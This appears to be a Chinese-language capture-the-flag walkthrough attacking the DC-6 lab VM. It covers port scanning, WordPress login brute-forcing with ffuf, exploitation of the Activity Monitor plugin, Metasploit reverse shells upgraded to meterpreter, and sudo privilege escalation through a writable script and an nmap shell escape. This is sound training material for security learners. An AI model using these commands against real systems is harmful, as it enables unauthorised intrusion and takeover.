DC-6

author：leadlife

data：2023/5/17

blog：https://tripse.github.io/

本次测试使用到的工具如下：

信息收集：nmap、fscan、cmseek、searchsploit、ffuf、burpsuite

SHELL：MSF、netcat

内部信息收集：无

权限提升：无

外部信息收集

Nmap ICMP 扫描发现主机

本次测试靶机 IP：10.10.10.135

1	sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-17 03:10 CST
Nmap scan report for 10.10.10.135
Host is up (0.00020s latency).
MAC Address: 08:00:27:D7:63:00 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.254
Host is up (0.00019s latency).
MAC Address: 00:50:56:FE:A1:CD (VMware)
Nmap scan report for 10.10.10.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 0.36 seconds

Fsacn 探测开放端口

1	sudo fscan -h 10.10.10.135 -p 0-65535 -t 30


   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.1
start infoscan
(icmp) Target 10.10.10.135    is alive
[*] Icmp alive hosts len is: 1
10.10.10.135:22 open
10.10.10.135:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://10.10.10.135       code:301 len:0      title:None 跳转url: http://wordy/

Nmap 进行详细端口扫描

1	sudo nmap -sS -sC -sV -O -T4 --min-rate 10000 10.10.10.135 -oN nmap.all

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-17 03:13 CST
Nmap scan report for 10.10.10.135
Host is up (0.00035s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 3e52cece01b694eb7b037dbe087f5ffd (RSA)
|   256 3c836571dd73d723f8830de346bcb56f (ECDSA)
|_  256 41899e85ae305be08fa4687106b415ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 08:00:27:D7:63:00 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.61 seconds

修改 Hosts

无法访问，修改绑定

再次访问测试成功，发现为 wordpress CMS

CMSeek 判断 CMS 版本

信息如下：

操作用户名为列表，后面爆破会使用到：

leadlife@endeavrouOS ~/p/DC6> cat user.txt
mark
admin
graham
jens
sarah

searchsploit 搜寻 cms 版本漏洞

无远程 RCE

进入后台

暴力破解

使用到 ffuf，操作手法如下：

burpsuite 抓包

保存数据包文本

修改需要 FUZZ 端点

wordpress 默认后台地址：http://wordy/wp-login.php

1：burpsuite 抓包

2：保存数据包文本

3：修改需要 FUZZ 端点

4：开始爆破

靶机作者提示：

将含有 k01 的密码导出，操作该命令即可：

seclists 已包含 rockyou：/usr/share/seclists/Passwords/Leaked-Databases

leadlife@endeavrouOS /u/s/s/P/Leaked-Databases> pwd
/usr/share/seclists/Passwords/Leaked-Databases
leadlife@endeavrouOS /u/s/s/P/Leaked-Databases> ls | grep rockyou
rockyou-05.txt
rockyou-10.txt
rockyou-15.txt
rockyou-20.txt
rockyou-25.txt
rockyou-30.txt
rockyou-35.txt
rockyou-40.txt
rockyou-45.txt
rockyou-50.txt
rockyou-55.txt
rockyou-60.txt
rockyou-65.txt
rockyou-70.txt
rockyou-75.txt
rockyou.txt
rockyou.txt.tar.gz
rockyou-withcount.txt.tar.gz

操作 ffuf 爆破：

1	ffuf -request data.txt -request-proto http -mode clusterbomb -w user.txt:FUZZ1 -w passwords.txt:FUZZ2 -t 30 -rate 10000 -fw 188

成功登入：

后台 GetSHELL

发现插件 Activity monitor

查找该插件是否存在漏洞：

漏洞利用尝试

成功 GetSHELL

copy 到当前目录： searchsploit -m php/webapps/50110.py

imag1231

稳定 SHELL

由于该 SHELL 并不稳定，这里利用 MSF 拿一个稳定的 SHELL

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  0.0.0.0          yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit

优化 SHELL

再转为 meterpreter SHELL

用到的模块：post/multi/manage/shell_to_meterpreter

步骤如下：

首先将当前 session 转到后台：background

利用模块，注意端口占用

background
Background session 1? [y/N]  y
msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST    0.0.0.0          no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION  1                yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(multi/manage/shell_to_meterpreter) > set lhost 10.10.10.1
lhost => 10.10.10.1
msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.10.1:4321
[*] Sending stage (1017704 bytes) to 10.10.10.135
[*] Meterpreter session 2 opened (10.10.10.1:4321 -> 10.10.10.135:58272) at 2023-05-17 04:11:21 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i

Active sessions
===============

  Id  Name  Type                   Information              Connection
  --  ----  ----                   -----------              ----------
  1         shell sparc/bsd                                 10.10.10.1:4444 -> 10.10.10.135:55952 (10.10.10.135)
  2         meterpreter x86/linux  www-data @ 10.10.10.135  10.10.10.1:4321 -> 10.10.10.135:58272 (10.10.10.135)

msf6 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.10.10.135
OS           : Debian 9.8 (Linux 4.9.0-8-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

然后即可操作 shell -t 进入交互式，若 shell -t 无法进入，则直接输入 shell，然后操作 Python 交互式 SHELL 即可

meterpreter > shell
Process 1617 created.
Channel 4 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-6:/home$ export TERM=xterm

内部信息收集

内核与发行版

SUID

无可利用 suid

1	find / -perm -4000 2</dev/null

www-data@dc-6:/home$ find / -perm -4000 2</dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping

SUDO

无 sudo

权限提升

在 mark home 目录下发现 graham 密码：

在 jens home 目录下发现 backups.sh shell 脚本，疑似计划任务，查看计划任务表后排除该提权法

切换到 graham 发现有 sudo 位，文件是：/home/jens/backups.sh

查看 graham 权限，发现所属 devs 组，可任意操作 backups.sh 文件：

修改 backups.sh 内容如下：

执行后得到 jens 的 shell：

利用 SUDO 提权

nmap sudo 提权

该方法失败：仅适用于低版本 Nmap

1 2	sudo nmap --interactive nmap> !sh

利用方法 2：

1
2
3

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF